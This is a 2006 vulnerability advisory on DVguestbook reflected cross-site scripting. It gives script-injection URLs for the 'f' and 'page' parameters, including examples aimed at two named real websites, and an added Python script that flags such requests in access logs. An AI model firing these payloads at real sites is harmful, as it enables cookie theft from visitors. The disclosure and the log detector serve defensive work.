Computer Security
[EN] securityvulns.ru
From::) :) <liz0_(at)_bsdmail.com>
Date:05.03.2006
Subject:DVguestbook 1.0 And 1.2.2 Cross Site Scripting

---------------------------------------------------------------------------------
DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Site:http://suprem.free.fr

Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail   :liz0@bsdmail.com

---------------------------------------------------------------------------------
DVguestbook 1.0 Xss

http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)</script>

DVguestbook 1.2.2 Xss

http://victim/path/index.php?page="><script>alert(document.cookie)</script>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</script>

---------------------------------------------------------------------------------
Example:

DVguestbook 1.0

http://www.award-computer.com/OR/dv_gbook.php?d=0&f='"><script>alert(/Liz0ziM/)</script>


DVguestbook 1.2.2

http://www.moah-fiya.com/guestbook/index.php?page="><script>alert(/Liz0ziM/)</script>


---------------------------------------------------------------------------------
Source:

http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt
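
Added example (not part of the original advisory and not DVguestbook code): a log check for the two request patterns reported above, the f parameter of dv_gbook.php and the page parameter of index.php, flagging values that carry quote or angle-bracket characters after decoding. The Apache-style log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script name -> parameter the advisory reports as reflected.
WATCHED = {"dv_gbook.php": "f", "index.php": "page"}
# Characters that let a value leave an HTML attribute or open a tag.
BREAKOUT = re.compile(r"[\"'<>]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2006:10:00:01 +0000] "GET /gb/dv_gbook.php?d=0&f=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Mar/2006:10:02:17 +0000] "GET /gb/dv_gbook.php?d=0&f=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5301',
    '192.0.2.44 - - [05/Mar/2006:10:02:40 +0000] "GET /gb/index.php?page=%2522%253E%253Cb%253E HTTP/1.1" 200 4977',
    '192.0.2.10 - - [05/Mar/2006:10:03:05 +0000] "GET /gb/index.php?page=2 HTTP/1.1" 200 4800',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for flagged requests."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue  # not one of the two scripts named in the advisory
        # parse_qs decodes once; fully_decode catches double encoding.
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = fully_decode(raw)
            if BREAKOUT.search(value):
                hits.append((line_no, script, param, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit in the log only shows that such a request was received; whether the value was reflected unencoded depends on the installed version's output handling.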





© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


